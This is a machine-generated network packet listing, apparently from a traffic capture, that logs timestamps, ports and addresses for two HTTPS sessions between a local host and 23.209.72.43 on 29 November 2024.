Nov 29, 2024 12:28:13.889183998 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.889260054 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.889269114 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:13.913413048 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.069808960 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.097302914 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.167678118 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.167691946 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.167696953 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.167702913 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.167710066 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.168134928 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.168247938 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.168450117 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.189675093 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.189693928 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.226161003 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.287568092 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.287586927 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.287600040 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.287825108 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.287837982 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.287847996 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.287853003 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.287862062 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.287870884 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.287878036 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.287883997 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.287889957 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.287894964 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.287900925 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.287908077 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.287950993 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.288038969 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.288047075 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.288052082 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.288058043 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.288068056 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.288110971 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.288119078 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.288544893 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.288944006 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.288950920 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.288984060 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.289010048 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.289025068 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.289031982 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.289037943 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.289047003 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.289052963 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.289058924 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.289942026 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.289949894 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.289961100 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.289967060 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.289978027 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.289989948 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.289995909 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.290002108 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.290013075 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.290020943 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.290436029 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.290493965 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.290694952 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.290714979 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.290853024 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.290863991 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.290875912 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.290884972 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.290894032 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.290894985 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.290900946 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.290906906 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.290914059 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.291676998 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.291747093 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.292220116 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.292445898 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.299525023 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.299545050 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.299557924 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.299689054 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.299740076 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.299747944 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.299763918 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.300126076 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.300134897 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.300142050 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.304414034 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.310831070 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.310873032 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.310879946 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.311091900 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.311103106 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.311116934 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.311122894 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.311448097 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.311460972 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.311476946 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.313010931 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.322201014 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.322246075 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.322253942 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.322403908 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.322453022 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.322460890 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.322472095 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.322765112 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.322804928 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.322810888 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.323549986 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.326499939 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.333923101 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.333966017 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.333972931 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.334103107 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.334224939 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.334243059 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.334249973 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.334263086 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.334609985 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.334620953 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.335160971 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.345170021 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.345212936 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.345220089 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.345381975 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.345387936 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.345400095 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.345407009 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.345763922 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.345768929 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.345781088 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.346510887 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.356302977 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.356364965 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.356372118 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.356496096 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.356568098 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.356575012 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.356586933 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.356928110 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.356935024 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.356941938 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.357408047 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.368056059 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.368129015 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.368135929 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.368319988 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.368365049 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.368407011 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.368415117 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.368731022 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.368736982 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.368748903 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.369090080 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.381304979 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.381350040 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.381356955 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.381589890 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.381597042 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.381608009 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.381614923 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.381947994 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.381954908 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.381967068 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.382245064 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.402432919 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.402472019 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.402483940 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.402688026 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.402730942 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.402743101 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.402745008 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.403251886 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.403258085 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.403269053 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.403410912 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.403521061 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.403527975 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.403553963 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.403743029 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.403754950 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.403762102 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.403768063 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.403940916 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.403968096 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.403975010 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.404931068 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.413415909 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.413456917 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.413593054 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.413599968 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.413727999 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.442681074 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.526016951 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.526355028 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.631795883 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.637774944 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.644973993 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.650547981 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.657303095 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.657349110 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.657442093 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.657452106 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.657689095 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.657773018 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.691751003 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.965147018 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.970055103 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.970094919 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.970212936 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.970217943 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.970227003 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:14.970474005 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:14.982872009 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:15.016515017 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.316220045 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.322189093 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.322278976 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.322413921 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.322521925 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.322529078 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.322613001 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.322618008 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.322729111 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:15.335678101 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:15.668586969 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.674734116 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.674972057 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.675026894 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.675102949 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:15.675105095 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.675117016 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.675299883 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.675318956 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.675328016 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.675342083 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.675610065 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.675616980 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.675632000 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.675638914 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.675645113 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.675829887 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:15.675884008 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.675961971 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.675973892 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.675983906 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.675997019 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.691720963 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.691735983 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.691745043 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.691751003 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.691812992 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.691821098 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.691827059 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.692092896 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.692107916 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.692116022 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.692257881 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:15.698425055 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.698465109 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.698472023 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.698591948 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.698601961 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.698607922 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.698620081 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.698709011 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.698714972 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:15.698781013 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.698793888 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.709539890 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.709700108 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.709711075 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.709736109 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.709743977 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.709769964 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.709777117 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.709959984 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:15.710206032 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.710248947 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.710256100 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.720729113 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.720791101 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.720803022 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.720959902 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.721005917 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:15.721020937 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.721026897 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.721041918 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.721223116 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.721227884 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.721239090 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.731472969 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:15.752993107 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:15.771161079 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:16.032850027 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.105330944 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.110764027 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.110924006 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.110930920 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.110943079 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.110949039 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.111093998 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.111126900 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:16.111248970 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.111255884 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.111268044 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.111390114 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.127147913 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:16.460460901 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.465532064 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.465929985 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:16.465977907 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.466074944 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.466089010 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.466186047 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.466192007 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.466454029 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.466460943 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.466473103 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.466573000 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.466578960 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.466590881 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.466727972 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:16.481729031 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:16.815258026 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.820425034 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.820631981 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.820739031 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.820745945 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.820869923 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:16.820871115 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.820877075 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.820888996 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.821079016 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.821085930 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.821098089 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.821317911 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.821376085 CET	443	62648	23.209.72.43	192.168.2.8
